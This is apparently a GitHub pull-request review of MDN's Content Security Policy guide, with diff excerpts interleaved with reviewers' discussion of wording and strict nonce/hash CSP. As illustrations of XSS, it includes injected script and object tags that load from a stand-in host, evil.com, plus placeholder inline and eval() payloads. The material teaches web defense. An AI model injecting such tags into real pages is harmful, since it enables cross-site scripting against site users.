CSP guide updates (#36157)
mdn/content: files/en-us/web/http/csp/index.md

title: Content Security Policy (CSP)
slug: Web/HTTP/CSP
page-type: guide
---

{{HTTPSidebar}}

> **Content Security Policy** (CSP) is a feature that helps to prevent or minimize the risk of certain types of security threats. It consists of a series of instructions from a website to a browser, which instruct the browser to place restrictions on the things that the code comprising the site is allowed to do.

Reviewer: ```suggestion
**Content Security Policy** (CSP) is a feature that helps to prevent or minimize the risk of certain types of security threats. It consists of a series of directives from a server that instruct the browser to place restrictions on the things that the code comprising the site is allowed to do.
```

Reviewer 2: Very small nit-- do we want to say "server" here even though we explain that meta tags can deliver CSP a little bit later?

Author: I intentionally avoided "directives" here because I think it is jargon-y compared with "instructions" (it is a "term of art" in the context of a CSP), and in the first sentence we haven't yet defined it. I didn't like "instructions...that instruct" though and am happy enough to go along with "directives" if you still prefer it.

I think "website" is probably OK too? Because what I'm trying to get across here is that the website as a whole has a policy about what the code should be allowed to do, the fact that it comes from the server is implementation.

Reviewer: Seems reasonable. Setting as resolved.

The primary use case for CSP is to control which resources, in particular JavaScript resources, a document is allowed to load. This is mainly used as a defense against {{glossary("cross-site scripting")}} (XSS) attacks, in which an attacker is able to inject malicious code into the victim's site.

A CSP can have other purposes as well, including defending against {{glossary("clickjacking")}} and helping to ensure that a site's pages will be loaded over HTTPS.

In this guide we'll start by describing how a CSP is delivered to a browser and what it looks like at a high level.

Then we'll describe how it can be used to [control which resources are loaded](#controlling_resource_loading) to protect against XSS, and then other use cases such as [clickjacking protection](#clickjacking_protection) and [upgrading insecure requests](#upgrading_insecure_requests). Note that there's no dependency between the different use cases: if you want to add clickjacking protection but not XSS mitigation, you can just add the directives for that use case.

Finally we'll describe [strategies for deploying a CSP](#testing_your_policy) and tools that can help to make this process easier.

## CSP overview

> A CSP should be delivered to the browser in the {{httpheader("Content-Security-Policy")}} response header. It should be set on all responses to all requests, not just the main document. You can also specify it using the [`http-equiv`](/en-US/docs/Web/HTML/Element/meta#http-equiv) attribute of your document's {{htmlelement("meta")}} element, but this does not support all CSP features and is not recommended for production sites.

Reviewer 2: Do we want to be as strong as to say "not recommended for production sites"? We want to recommend it for certain limited use cases, such as a clientside-rendered single page app with static resources, where it's easier to stick a hash-based CSP in a meta tag so that we don't have to rely on the serving infrastructure to support noncing properly.

Author: -> https://github.com/mdn/content/pull/36157/commits/60879060736a5bc8eb851837316fa96c9fe978b1

The policy is specified as a series of _directives_, separated by semi-colons. Each directive controls a different aspect of the security policy. Each directive has a name, followed by a space, followed by a value. Different directives can have different syntaxes.

For example, consider the following CSP:

```plain
Content-Security-Policy: default-src 'self'; img-src 'self' example.com
```

It sets two directives:

> - the `default-src` directive is set to `'self'`

Reviewer: Is it worth adding a brief explanation here of each directive? Something like
```suggestion
- the `default-src` directive is set to `'self'`, which allows only same-origin resources to be loaded for directives that aren't specified.
```

One thing I've always found quite powerful is that default-src is a catchall. The implication being that you typically lock down everything, then progressively allow access.

Reviewer: PS I understand this is just the first mention, and you want to show the format of the directive string. Feels a little "abstract" even for an overview.

Reviewer: On reflection, perhaps a paragraph after the image stating something like

The first (`default-src`) directive sets a restriction that will be used to allow only same-origin resources to be loaded for directives that aren't specified. The second explicitly ....

Author: Done in https://github.com/mdn/content/pull/36157/commits/1ada7b0e71709495201a4cde94d1c43556d60224, although I didn't really want to. At this point I only really want to explain that, syntactically, there are these things called directives. By explaining what particular directives do I worry that we're trying to explain everything at once, and making it overwhelming.

Reviewer: I slightly prefer it as you have now done it, though certainly arguable. If you really hate it feel free to remove.

> - the `img-src` directive is set to `'self' example.com`.

Reviewer: Ditto ^^^

![A CSP broken into its directives.](csp-overview.svg)

In the next section, we'll look at the tools available to control resource loads, which is the main function of a CSP.

## Controlling resource loading

A web page usually doesn't consist of just an HTML document. It usually loads various other resources, such as JavaScript files, stylesheets, images, fonts, and so on, through HTML elements like {{htmlelement("script")}} or {{htmlelement("style")}}, CSS properties like {{cssxref("font")}} or {{cssxref("background-image")}}, and Web APIs like {{domxref("Window.fetch", "fetch()")}}.

By default a document can:

- load resources from any location
- embed inline JavaScript
- execute text as JavaScript using APIs like [`eval()`](/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval).

> These abilities can enable XSS attacks, including:

Reviewer: My understanding of XSS attacks is that a the browser is tricked into executing code it should not. For example, you have some kind of text input box. A malicious user might include HTML in an entry that then gets stored and displayed elsewhere. This could contain an inline script, or perhaps a tag that references and external script. At that point the browser executes it, because it is part of the site, delivered from the server.

One protections is to sanitize all your input. CSP is a complementary approach where the server says you can't use scripts, images, etc except from particular places. So even if the browser does have code injected that tries to run a script from an untrusted place, it won't get used.

When I read this section, it tells me injection is a bad thing and that you aren't protected against it, but it didn't give me that feel for how that injection happens and how CSP helps. I don't see that line drawn further down the doc either (on quick scan). 

Does that make sense as a problem that needs to be fixed here?

Reviewer 2: I agree that CSP is one part of a comprehensive defense against XSS -- but a vital part. I agree that, as you mentioned, stored XSS should be dealt with (as a first layer of defense) through best practices around server side input handling and databases, and reflected XSS through sanitization and context-aware templating, but a nonce or hash based CSP will make these exploits that much harder. (As a concrete example, even if you had a way to sneak in a <script> tag in the server side generated HTML, with a context-aware templating system with proper nonce support wouldn't propagate the nonce to this unintended script tag, so a nonce-based policy would offer greater protection than a script-src 'self' here even in the event of the backend not sanitizing properly).

I think your point highlights the main difficulty around how to communicate what exactly CSP protects and how-- the point that I'd like to see get across is that as a defense-in-depth against XSS, it works in conjunction with a bunch of other best practices, and even in that case, a nonce or hash based version adds the most value.

Reviewer: Yes, so the defense in depth thing is important. It also feels like we mention the nonce thing later on, but ideally it should be forward referenced as early as possible.

My point though was more about that how this works to prevent XSS injection is unintuitive unless you are quite familiar with injection. Specifically, my first thought was "how is this going to help if someone can control the headers that the browser is receiving". I know that isn't relevant to XSS injection, but that took me some thinking, and going back to the books. I think we can afford a few sentences here to make this a bit more "real"

Author: Do you think it would be better to rename this whole H2 section from "Controlling resource loading" to "XSS protection"? I think the reason I didn't, was because there might be other things we want to control resource loads for. OTOH, "XSS protection" is a much more direct title, and makes it easier to lead in with a description of XSS here. And I'm not sure what those "other things" are - concretely, I only really talk about XSS as a motivation.

Alternatively, I could add an H3 on XSS, near the start, maybe where "These abilities can enable XSS attacks, including:" is now.

Reviewer: I have vacillated back and forth a few times while answering this, and I still don't know. So here are some thoughts/ideas.

- I like the current title and your reasons for it are the same I would use. 
- On the other hand, you have chosen "Clickjacking protection" and that would reasonably be "Controlling allowed embedders" by similar logic. You've chosen that for good reasons though - this is the problem it solves, and it makes the whole thing more concrete.
- I'm not sure what would work best if you were to add trusted types directives and split the doc into separate documents - in particular with respect to people finding it. 
- If it were me writing this I'd probably try and compromise by doing the H3 on XSS, because I'm adverse to change when I have a structure that I thinks works and is extensible.
- If you keep the current heading, you might start with a sentence like 

  > CSP controls the specific resources, resources, resource types, or resource locations, that can be loaded to those that are trusted by the developer. This is primarily used for XSS Protection.
  
  Then talk about this as though the heading were XSS Protection.
- If you were to rename this "XSS protection" you could still start with a sentence like 

  > CSP provides XSS protection by restricting the resources that the document is allowed to load to specific resources, resource types, or resource locations, that are trusted by the developer.

- Is there a compromise that allows you to rewrite the way you want but capture both aspects - e.g. a title like XSS Protection with controlled resource loading - I don't think so, but may you can think of one

If none of that is helpful then yes, I would change the heading. It is better than being blocked if that is what you need to do in order to write this effectively.

Author: Thank you, that is super-helpful! I have had a go at "keeping the same H2" in https://github.com/mdn/content/pull/36157/commits/18296b8e24dc647fb705aacc316bdecc2986c6d6 - it mostly adds a new H3 on XSS and resource loading" which tries to make that connection.

Reviewer: I love it.

- injecting a `<script>` tag that links to a malicious source:

  ```html
  <script src="https://evil.com/hacker.js"></script>
  ```

- injecting a malicious inline script:

  ```html
  <script>
    // something bad
  </script>
  ```

- tricking a site into executing a string containing malicious code:

  ```js
  eval("// something bad");
  ```

- injecting an {{htmlelement("object")}} element that loads a malicious plugin:

  ```html
  <object data="https://evil.com/hacker.plugin"></object>
  ```

> So one of the main functions of a CSP to to control which resources a web page is allowed to load. In this section we'll look at the tools CSP provides for this, and then we'll look at one particular recommended strategy, which is called a "Strict CSP".

Reviewer: ```suggestion
So one of the main functions of a CSP is to control which resources a web page is allowed to load. In this section we'll look at the tools CSP provides for this, and then we'll look at one particular recommended strategy, which is called a "Strict CSP".
```

### Fetch directives

> The group of CSP directives which control resource loads are called _fetch directives_. Fetch directives describe which resources — such as JavaScript, CSS stylesheets, images, fonts, and so on — a document is allowed to load.

Reviewer: Which resources and from what locations?

Author: It's tricky to talk about locations here, and I have avoided it as much as I can when talking in general terms, because nonce and hash based directives are not about location. By "which resources ... a document is allowed to load" I don't mean, whether a given resource _type_ is allowed to load at all, I mean, whether a single given resource - considering its location, its hash value, etc etc - will be allowed to load.

Author: I could say something like: "Fetch directives determine whether a specific resource — such as a script, a CSS stylesheet, an image, and so on — will be allowed to load."

?

Reviewer: Hmmm. Fair enough. What we need to be clear on is that each directive controls permission for loading a different resource 

How about:

```suggestion
Fetch directives are used to specify the conditions under which a document is allowed to load a specific type of resource — such as JavaScript, CSS stylesheets, images, fonts, and so on — a document is allowed to load.
```

Mabye "rules" not conditions.

Author: This is literally the first sentence about fetch directives. I want to say what they do _as a category of thing_ before getting into details.

> What we need to be clear on is that each directive controls permission for loading a different resource

We say that in the next sentence: "There are different fetch directives for different types of resource." Would it be OK if instead we changed that sentence to "Each fetch directive controls a specific type of resource."

I don't think your edit conveys this either: when I read "Fetch directives are used to specify the conditions under which a document is allowed to load a specific type of resource" it doesn't seem clear to me that each directive controls a different resource.

Reviewer: I think the sentence that grates the most is the first one "The group of CSP directives which control resource loads are called _fetch directives_. ". However it might be the fact that this feels a bit odd/repetitive with the second sentence. 
You do have the information as the following sentence so perhaps I am just being overly picky.

> Would it be OK if instead we changed that sentence to "Each fetch directive controls a specific type of resource."

I would like that more. Perhaps

```suggestion
Fetch directives are used to specify a particular category of resource that a document is allowed to load — such as JavaScript, CSS stylesheets, images, fonts, and so on.
```

If not, ignore all this, it isn't worth the time.

There are different fetch directives for different types of resource. For example:

> - `script-src` sets allowed sources for JavaScript.

Reviewer: While obvious, since this is the first use of the term "sources" it might be worth providing a flavour for what you mean by "sources" here. Just a thought .

```suggestion
- `script-src` sets allowed sources for JavaScript, such as inline scripts, or external scripts from particular origins.
```

Author: I don't think this is what "source" means in this context. A "source" here isn't a "source file", it's more like "the place something comes from". I think?

Reviewer: You're right. Different suggestions - it is external javascript (inline is covered by unsafe-inlin) and perhaps link to the directive page(s) everywhere?

```suggestion
- [`script-src`](/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src) sets allowed sources for external JavaScript.
```

- `style-src` sets allowed sources for CSS stylesheets.
- `img-src` sets allowed sources for images.

> One special fetch directive is `default-src`, which sets a fallback policy for all resources whose directives are not explicitly listed.

Reviewer: This is good. I feel like it would be good to provide guidance on setting this, but I'm not sure what that should be. Probably to set `self` or `none`.

Author: In this guide, "guidance" is basically "use strict CSP". So this section (Fetch directives) doesn't really give guidance (except to avoid `unsafe-inline`). It just tells you what the tools are.

(But strict CSP doesn't say anything about `default-src` so I don't know what the guidance should be.)

Reviewer: Fair enough. Pity - I don't think everyone will adopt strict CSP, at least not initially, and there must be useful advice you can apply if you can't. 
Something like default-src might be set to `none` by default and then extend your policy with more-specific directives as needed.

But fact is I don't know :-)

For example, the CSP below sets two fetch directives:

- `default-src` is given the single source expression `'self'`
- `img-src` is given two source expressions: `'self'` and `example.com`

![CSP diagram showing source expressions](csp-source-expressions.svg)

The effect of this is that:

- images must be either same-origin with the document, or loaded from `example.com`
- all other resources must be same-origin with the document.

In the next few sections we'll describe some of the ways you can use source expressions to control resource loads. Note that although we're describing them separately, these expressions can in general be combined: for example, a single fetch directive may include nonces as well as hostnames.

#### Blocking resources

To block a resource type entirely, use the `'none'` keyword. For example, the following directive blocks all {{htmlelement("object")}} and {{htmlelement("embed")}} resources:

```plain
object-src 'none'
```

> Note that `'none'` cannot be combined with any other method: in practice, if any other source expressions are given alongside `'none'`, then they are ignored.

Reviewer: This might not be worth saying, but I misread earlier that `none` might be applied to to all directives if used anywhere. Obviously not, but ..

```suggestion
Note that `'none'` cannot be combined with any other method in a particular directive: in practice, if any other source expressions are given alongside `'none'`, then they are ignored.
```

#### Scheme-based policies

Fetch directives can list a scheme, like `https:`, to allow resources that are served using that scheme. This, for example, allows a policy to require HTTPS for all resource loads:

```plain
default-src https:
```

#### Location-based policies

Fetch directives can control resource loads based on where the resource is.

The keyword `'self'` allows resources which are same-origin with the document itself:

```plain
img-src 'self'
```

> You can also specify one or more hostnames, potentially including wildcards, and only resources served from those hosts will be allowed.

Reviewer: Just a thought, but this shows what is allowed, but not why you might set this rather than doing self. We could say stuff like "This might be used to allow content to be served from a trusted CDN.

Author: -> https://github.com/mdn/content/pull/36157/commits/e1e04076016282bddd78b589e3a0f704d02fe245

```plain
img-src *.example.org
```

You can specify multiple locations. The following directive allows only images that are same-origin with the current document, or are served from a subdomain of "example.org", or are served from "example.com":

```plain
img-src 'self' *.example.org  example.com
```

#### Nonces

> 

Reviewer: I'm not sure of the best way to do this, but if Nonces/Hashes are the recommended way to manage script resource then it would be better to have them before location based info. Minimally here we might forward reference the CSP Strict section with a note like

> **Note:** Nonces and hashes are recommended over location based restrictions for script resources. See [CSP strict] below ...

Author: I think structurally it would be straightforward to move "Nonces" and "Hashes" to be the first H4 headings under "Fetch directives". But I don't want to do this yet, I want confirmation that we really do only want to recommend strict CSP. The "Practical security guides" (https://developer.mozilla.org/en-US/docs/Web/Security/Practical_implementation_guides) that @chrisdavidmills migrated from mozilla.org does not recommend strict CSP, and I'd like to be sure we have consensus for this change.

Reviewer: I agree that moving them would be better. Who do we need to talk to for consensus?

W.r.t. the implementation guide, that just says "CSP", so its not a for or against the strict kind.
@chrisdavidmills Just FYI it refers to things like Clickjacking protection using iframes, but does not mention CSP in this context or COEP that provide a more layered defense for this particular problem. Not sure if worth addressing.

Author: > I agree that moving them would be better.

Fair enough, I've moved them in https://github.com/mdn/content/pull/36157/commits/8f6af6d534195526c54deaf60855140e55f2a0a5. Still have `'none'` first though.

> Who do we need to talk to for consensus?

I don't know. I think Chris is in touch with the Mozilla security team.

> W.r.t. the implementation guide, that just says "CSP", so its not a for or against the strict kind. 

It is though, the table row on CSP in https://developer.mozilla.org/en-US/docs/Web/Security/Practical_implementation_guides#content_security_fundamentals links to https://developer.mozilla.org/en-US/docs/Web/Security/Practical_implementation_guides/CSP#steps_for_implementing_csp, which describes an allowlist-based approach.

> @chrisdavidmills Just FYI it refers to things like Clickjacking protection using iframes, but does not mention CSP in this context or COEP that provide a more layered defense for this particular problem. Not sure if worth addressing.

Reviewer: OK. I've pinged him directly to look at this. Honestly I think we can do this in any case.

Reviewer 3: I think it is OK to go ahead and do. The moz sec folk are being a bit slow at getting back to me on this; 
I'll ping them again soon.

Reviewer 2: I know I've had this particular conversation with many of the folks already on this thread 😊 but for completeness, here's a more rigorous/evidence-based explanation of why we want to recommend a nonce/hash-only policy over an allowlist based policy: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45542.pdf

With a nonce, the server generates a random value for every HTTP response, and includes it in the directive:

```plain
script-src 'nonce-416d1177-4d12-4e3b-b7c9-f6c409789fb8'
```

It then includes the same value as the `nonce` attribute of one or more {{htmlelement("script")}} or {{htmlelement("style")}} tags in the document.

The browser compares the two values, and loads the resource only if they match. The idea is that even if an attacker can insert some JavaScript into the page, they won't know which nonce the server is going to use, so the browser will refuse to run the script.

> This means that it must not be possible for an attacker to guess the nonce: in practice this means that the nonce must be different for every HTTP response, and must not be predictable.

Reviewer: ```suggestion
For this approach to work, it must not be possible for an attacker to guess the nonce: in practice this means that the nonce must be different for every HTTP response, and must not be predictable.
```

Author: > I also wonder whether we should make the warning about not re-using nonces more prominent here!

I have boldified this. I can't really put it in a warning, because it's part of a thread:

1) attacker must not be able to guess the nonce
2) so it must not be predictable
3) so the HTML can't be static

...this would not really work if (2) were in a warning.

This in turn means that the server cannot serve static HTML, because it must insert a new nonce each time. Typically the server would use a templating engine to insert the nonce.

Here's a snippet of [Express](/en-US/docs/Learn/Server-side/Express_Nodejs) code to demonstrate:

```js
function content(nonce) {
  return `
    <script nonce="${nonce}" src="/main.js"></script>
    <script nonce="${nonce}">console.log("hello!");</script>
    <h1>Hello world</h1> 
    `;
}

app.get("/", (req, res) => {
  const nonce = crypto.randomUUID();
  res.setHeader("Content-Security-Policy", `script-src 'nonce-${nonce}'`);
  res.send(content(nonce));
});
```

On every request, the server generates a new nonce, inserts it into the CSP and into the {{htmlelement("script")}} tags in the returned document. Note that the server:

- generates a new nonce for every request
- can use nonces with both external and inline scripts
- uses the same nonce for all `<script>` tags in the document

> It's important that the server uses some kind of templating to insert nonces, and does not just insert them into all `<script>` tags: otherwise, the server might inadvertently insert nonces into scripts that were injected by an attacker.

Reviewer 2: Do we want to use the terminology "context-aware templating" here? Unfortunately, this might mean that we have to take a detour to explain this concept and sadly where many of the commonly used templating engines today fall short of this requirement...

Author: Would you mind elaborating what you mean by "context-aware templating" here, or pointing me to some resources on it?

In my understanding the power of a nonce or hash based approach is that it signals _an intentional choice by a developer_ to include a given script in this location, which prevents a script injection. So for example something like my Express example:

```js
function content(nonce) {
  return `
    <script nonce="${nonce}" src="/main.js"></script>
    <script nonce="${nonce}">console.log("hello!");</script>
    <h1>Hello world</h1> 
    `;
}
```

...meets that goal, even though it's obviously not realistic. Because a developer's asserting that they want these scripts here.Am I mistaken here?

Reviewer 2: The short explanation of "context-aware templating" is that for interpolations like `<a href="{variable}">` check that `variable` does not contain characters that can escape the link context nor allow schemes that can lead to XSS like `javascript:` or `data:`. Going into a full explanation of recommended properties for templating systems that cannot introduce XSS through

1. Bugs in the template
1. Bugs introduced by the user passing data to the template

is a much longer discussion that we are hoping to do in the future, so we can come back to linking this in when we have more resources around those ideas.

Author: One question I have though is: why do we need context-aware templating _in this case_, where we are just inserting a nonce, which is a value we have complete control over? I understand its purpose in general, when dealing with (potentially) attacker-controlled input, but that does not seem to apply here.

Reviewer 2: I think it's really a meta-point here that extends beyond using templates to insert CSP nonces: All of our efforts to adopt CSP only becomes a defense-in-depth against XSS if all of the other parts of the stack also can't inadvertently introduce vulnerabilities-- and we like to use the term "context-aware templating" rather than just "templating" to point out that without context-aware autoescaping, template systems aren't inherently safe. (We want to increase the awareness of this point because we don't hear "context-aware templating" being talked about all that often.)

But I completely agree, this is something we can come back to later because it is a bit of a tangent (albeit a super important one in the space of XSS defense).

});
```

Note that:

- We have a separate hash for every script in the document.
- For the external script "main.js", we also include the `integrity` attribute, and give it the same value.
- Unlike the example using nonces, both the CSP and the content can be static, because the hashes stay the same.

#### Inline JavaScript

If a CSP contains either a `default-src` or a `script-src` directive, then inline JavaScript will not be allowed to execute unless extra measures are taken to enable it. This includes:

- JavaScript included inside a `<script>` element in the page:

  ```html
  <script>
    console.log("Hello from an inline script");
  </script>
  ```

- JavaScript in an inline event handler attribute:

  ```html
  <img src="x" onerror="console.log('Hello from an inline event handler')" />
  ```

- JavaScript in a `javascript:` URL:

  ```html
  <a href="javascript:console.log('Hello from a javascript: URL')"></a>
  ```

The `unsafe-inline` keyword can be used to override this restriction. For example, the following directive requires all resources to be same-origin, but allows inline JavaScript:

```plain example-bad
default-src 'self' 'unsafe-inline'
```

> **Developers should avoid `'unsafe-inline'`, because it defeats much of the purpose of having a CSP.** Inline JavaScript is one of the most common XSS vectors, and one of the most basic goals of a CSP is to prevent its uncontrolled use.

Reviewer: FWIW I would put this in a warning block.

Author: -> https://github.com/mdn/content/pull/36157/commits/ca9a4b7dd22f67533d33291e7d87a30594697d11

Inline `<script>` elements are allowed if they are protected by a nonce or a hash, as described above. If a directive contains nonce or hash expressions, then the `unsafe-inline` keyword is ignored by browsers.

### `eval()` and similar APIs

Like inline JavaScript, if a CSP contains either a `default-src` or a `script-src` directive, then `eval()` and similar APIs will not be allowed to execute. This includes, among other APIs:

- [`eval()`](/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) itself:

  ```js
  eval('console.log("hello from eval()")');
  ```

- The {{jsxref("Function/Function()", "Function()")}} constructor:

  ```js
  const sum = new Function("a", "b", "return a + b");
  ```

- The string argument to {{domxref("setTimeout()")}} and {{domxref("setInterval()")}}:

  ```js
  setTimeout("console.log('hello from setTimeout')", 1);
  ```

The `unsafe-eval` keyword can be used to override this behavior, and as with `unsafe-inline`, and for the same reasons: **developers should avoid `unsafe-eval`**.

Unlike `unsafe-inline`, the `unsafe-eval` keyword does still work in a directive that contains nonce or hash expressions.

### Strict CSP

> To control script loading as a mitigation against XSS, current recommended practice is to use nonce- or hash- based fetch directives. This is called a _strict CSP_. This type of CSP has two main advantages over a location-based CSP (usually called an _allowlist CSP_):

Reviewer: ```suggestion
To control script loading as a mitigation against XSS, recommended practice is to use nonce- or hash- based fetch directives. This is called a _strict CSP_. This type of CSP has two main advantages over a location-based CSP (usually called an _allowlist CSP_):
```

> - Allowlist CSPs are hard to get right and often don't provide effective protection against XSS (see [CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy](https://dl.acm.org/doi/pdf/10.1145/2976749.2978363)).

Reviewer: Just a thought - nice to say why they don't get it right.

```suggestion
- Allowlist CSPs are hard to get right and often policies inadvertently whitelist unsafe domains, and hence don't provide effective protection against XSS (see [CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy](https://dl.acm.org/doi/pdf/10.1145/2976749.2978363)).
```

> - Allowlist CSPs can be very large and hard to maintain. According to [How I learned to stop worrying and love the Content Security Policy](https://www.netlify.com/blog/general-availability-content-security-policy-csp-nonce-integration/), just to integrate Google Analytics, a developer is asked to add 187 Google domains to the allowlist.

Reviewer: ```suggestion
- Allowlist CSPs can be very large and hard to maintain, in particular when using scripts that are outside of your control. According to [How I learned to stop worrying and love the Content Security Policy](https://www.netlify.com/blog/general-availability-content-security-policy-csp-nonce-integration/), just to integrate Google Analytics, a developer is asked to add 187 Google domains to the allowlist.
```

Reviewer: @wbamberg In case you missed this.

<p onclick="console.log('Hello from an inline event handler')">click me</p>
```

```html
<!-- served with the following CSP:
 `script-src 'sha256-AjYfua7yQhrSlg807yyeaggxQ7rP9Lu0Odz7MZv8cL0='`
 -->
<p id="hello">click me</p>
<script>
  const hello = document.querySelector("#hello");
  hello.addEventListener("click", () => {
    console.log("Hello from an inline script");
  });
</script>
```

## Clickjacking protection

The [`frame-ancestors`](/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors) directive can be used to control which documents, if any, are allowed to embed this document in a nested browsing context such as an {{htmlelement("iframe")}}. This is an effective protection against clickjacking attacks, because these attacks depend on embedding the target site in a site controlled by the attacker.

The syntax of `frame-ancestors` is a subset of the fetch directive syntax: you can provide the single keyword value `'none'` or one or more source expressions. However, the only source expressions you can use are schemes, hostnames, or the `'self'` keyword value.

Unless you need your site to be embeddable, you should set `frame-ancestors` to `'none'`:

> ```plain

Reviewer: ```http

> frame-ancestors 'none'

Reviewer: ```suggestion
Content-Security-Policy: frame-ancestors 'none'
```

Reviewer: Ditto for the other cases - worth listing the header and making the codeblock type http.

Author: -> https://github.com/mdn/content/pull/36157/commits/19069ca276c05916c0d8d2586724b4cb3b7570e4

```html
<img src="http://example.org/my-cat.jpg" />
```

This is called _mixed content_, and the presence of insecure resources greatly weakens the protection afforded by HTTPS. Under the [mixed content algorithm](/en-US/docs/Web/Security/Mixed_content) that browsers implement, if a document is served over HTTPS, insecure resources are categorized into "upgradable content" and "blockable content". Upgradable content is upgraded to HTTPS, and blockable content is blocked, potentially breaking the page.

The ultimate solution to mixed content is for developers to load all resources over HTTPS. However, even if a site is actually able to serve all content over HTTPS, it can still be very difficult (or even effectively impossible, where archived content is concerned) for a developer to rewrite all the URLs the site uses to load resources.

The [`upgrade-insecure-requests`](/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/upgrade-insecure-requests) directive is intended to solve this problem. This directive doesn't have any value: to set it, just include the directive name:

```plain

> upgrade-insecure-requests

Reviewer: Add header prefix

Author: -> https://github.com/mdn/content/pull/36157/commits/19069ca276c05916c0d8d2586724b4cb3b7570e4

```

If this directive is set on a document, then the browser will automatically upgrade to HTTPS any HTTP URLs in the following cases:

- requests to load resources (such as images, scripts, or fonts)
- navigation requests (such as link targets) which are same-origin with the document
- navigation requests in nested browsing contexts, such as iframes
- form submissions

However, top-level navigation requests whose target is a different origin will not be upgraded.

For example, suppose the document at `https://example.org` is served with a CSP containing the `upgrade-insecure-requests` directive, and the document contains markup like this:

```html
<img src="http://example.org/my-cat.jpg" />
<img src="http://not-example.org/another-cat.jpg" />

> ```

Reviewer: It might be worth using a script for this example. My reasoning is that now all browsers except safari upgrade images and videos by default for mixed content (but not scripts). So in this case you'll be better off on safari but no impact on FF or Chrome.

For example, consider the following CSP:

```http
Content-Security-Policy: default-src 'self'; img-src 'self' example.com
```

It sets two directives:

- the `default-src` directive is set to `'self'`
- the `img-src` directive is set to `'self' example.com`.

![A CSP broken into its directives.](csp-overview.svg)

The first directive, `default-src`, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types. The second, `img-src`, tells the browser to load images that are same-origin or that are served from `example.com`.

In the next section, we'll look at the tools available to control resource loads, which is the main function of a CSP.

## Controlling resource loading

A CSP can be used to control the resources that a document is allowed to load. This is primarily used for protection against cross-site scripting (XSS) attacks.

> In this section we'll first see how controlling resource laods can help protect against XSS, then at the tools CSP provides to control resource loads. Finally we'll describe one particular recommended strategy, which is called a "Strict CSP".

Reviewer: ```suggestion
In this section we'll first see how controlling resource loads can help protect against XSS, then at the tools CSP provides to control what resources are loaded. Finally we'll describe one particular recommended strategy, which is called a "Strict CSP".
```

### XSS and resource loading

A cross-site scripting (XSS) attack is one in which an attacker is able to execute their code in the context of the target website. This code is then able to do anything that the website's own code could do, including, for example:

- access or modify the content of the site's loaded pages
- access or modify content in local storage
- make HTTP requests with the user's credentials, enabling them to impersonate the user or access sensitive data

An XSS attack is possible when a website accepts some input which might have been crafted by an attacker (for example, URL parameters, or a comment on a blog post) and then includes it in the page without _sanitizing_ it: that is, without ensuring that it can't be executed as JavaScript.

> Websites should protect themselves against XSS by sanitizing this input before including it in the page. A CSP provides a complementary protection, which should protect the website even if sanitization fails.

Reviewer: Maybe, since you can screw up CSP too.
```suggestion
Websites should protect themselves against XSS by sanitizing this input before including it in the page. A CSP provides a complementary protection, which can protect the website even if sanitization fails.
```

  </script>
  ```

- An inline event handler:

  ```html
  <img onmouseover="console.log(`You've been hacked!`)" />
  ```

- A string argument to an unsafe API like [`eval()`](/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval):

  ```js
  eval("console.log(`You've been hacked!`)");
  ```

A CSP can provide protection against all of these. With a CSP, you can:

- define the permitted sources for JavaScript files and other resources, effectively blocking loads from `https://evil.com`
- disable inline script tags
- allow only script tags which have the correct nonce or hash set
- disable inline event handlers
- disable dangerous APIs like `eval()`

In the next section we'll go over the tools CSP provides to do these things.

> [!NOTE]
> Setting a CSP is not an alternative to sanitizing input. Websites should sanitize input _and_ set a CSP, providing defense in depth against XSS.

### Fetch directives

Fetch directives are used to specify a particular category of resource that a document is allowed to load — such as JavaScript, CSS stylesheets, images, fonts, and so on.

There are different fetch directives for different types of resource. For example:

> - `script-src` sets allowed sources for JavaScript.

Reviewer: Different suggestion - it is external javascript (inline is covered by unsafe-inline) and perhaps link to the directive page(s) everywhere?

```suggestion
- [`script-src`](/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src) sets allowed sources for external JavaScript.
```

Author: > it is external javascript 

Not necessarily, no, because using a nonce or a hash can apply to inline scripts as well.

- images must be either same-origin with the document, or loaded from `example.com`
- all other resources must be same-origin with the document.

In the next few sections we'll describe some of the ways you can use source expressions to control resource loads. Note that although we're describing them separately, these expressions can in general be combined: for example, a single fetch directive may include nonces as well as hostnames.

#### Blocking resources

To block a resource type entirely, use the `'none'` keyword. For example, the following directive blocks all {{htmlelement("object")}} and {{htmlelement("embed")}} resources:

```http
Content-Security-Policy: object-src 'none'
```

Note that `'none'` cannot be combined with any other method in a particular directive: in practice, if any other source expressions are given alongside `'none'`, then they are ignored.

#### Scheme-based policies

Fetch directives can list a scheme, like `https:`, to allow resources that are served using that scheme. This, for example, allows a policy to require HTTPS for all resource loads:

```http
Content-Security-Policy: default-src https:
```

#### Location-based policies

> Fetch directives can control resource loads based on where the resource is.

Reviewer: My taste
```suggestion
Fetch directives can control resource loads based on where the resource is located.
```

### `eval()` and similar APIs

Like inline JavaScript, if a CSP contains either a `default-src` or a `script-src` directive, then `eval()` and similar APIs will not be allowed to execute. This includes, among other APIs:

- [`eval()`](/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) itself:

  ```js
  eval('console.log("hello from eval()")');
  ```

- The {{jsxref("Function/Function()", "Function()")}} constructor:

  ```js
  const sum = new Function("a", "b", "return a + b");
  ```

- The string argument to {{domxref("Window.setTimeout()", "setTimeout()")}} and {{domxref("Window.setInterval()", "setInterval()")}}:

  ```js
  setTimeout("console.log('hello from setTimeout')", 1);
  ```

The `unsafe-eval` keyword can be used to override this behavior, and as with `unsafe-inline`, and for the same reasons: **developers should avoid `unsafe-eval`**.

Unlike `unsafe-inline`, the `unsafe-eval` keyword does still work in a directive that contains nonce or hash expressions.

### Strict CSP

> To control script loading as a mitigation against XSS, recommended practice is to use nonce- or hash- based fetch directives. This is called a _strict CSP_. This type of CSP has two main advantages over a location-based CSP (usually called an _allowlist CSP_):

Reviewer: Link nonce- and hash- to their headings above?

Author: -> https://github.com/mdn/content/pull/36157/commits/079e4f0b948d5d1ebd33848b003063b8a5a518d0

